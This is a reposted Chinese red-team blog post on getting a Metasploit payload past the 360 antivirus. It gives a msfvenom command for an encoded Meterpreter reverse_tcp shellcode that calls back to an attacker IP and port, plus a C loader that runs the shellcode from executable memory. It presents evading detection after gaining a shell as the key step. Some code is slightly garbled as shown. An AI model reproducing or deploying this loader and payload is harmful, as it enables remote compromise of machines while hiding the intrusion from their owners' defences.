Metasploit 生成 C 过免杀某60...

admin 2021年1月8日21:50:50评论253 views字数 769阅读2分33秒阅读模式

渗透攻击红队

一个专注于红队攻击的公众号

Metasploit 生成 C 过免杀某60...


大家好,这里是 渗透攻击红队 的第 43 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不定时更新


Metasploit 生成 C 过免杀某60...
免杀


在拿到一枚shell后,我们必须要做好权限维持,如果目标主机上有AV的话,我们一定要做好免杀处理,不能被发现!宁可不攻击也不要被发现,所以免杀是在内网渗透过程中最关键的一步!今天分享一个绕过某60的免杀技巧,总结就是:只要会代码,免杀随便绕!



Metasploit 生成 C 过免杀 360

Metasploit


Msf 相比大家都看过我直接写的笔记,大家也都会使用,这里也不一一细讲,直接上操作:

首先使用MSF的shikata_ga_nai构建x86一个shellcode:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.12 LPORT=9090 -e x86/shikata_ga_nai -i 8 -f c > shell.c

Metasploit 生成 C 过免杀某60...


然后使用 VC 编译(我用的是 VC 2019):

#include <stdio.h>#include <windows.h>
unsigned const char payload[] = "这里是生成的shellcode";
size_t size = 0;
int main(int argc, char** argv) {
char* code;
printf("Hello Hack saul!n");
code = (char*)VirtualAlloc(NULL, size, MEM_COMMIT,PAGE_EXECUTE_READWRITE);
memcpy(code, payload, size);
((void(*)())code)();
return(0);}

Metasploit 生成 C 过免杀某60...


字节可以改改,然后运行上线:
Metasploit 生成 C 过免杀某60...

Metasploit 生成 C 过免杀某60...


Metasploit 生成 C 过免杀某60...

本文始发于微信公众号(潇湘信安):Metasploit 生成 C 过免杀某60...

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年1月8日21:50:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit 生成 C 过免杀某60...http://cn-sec.com/archives/236824.html

发表评论

匿名网友 填写信息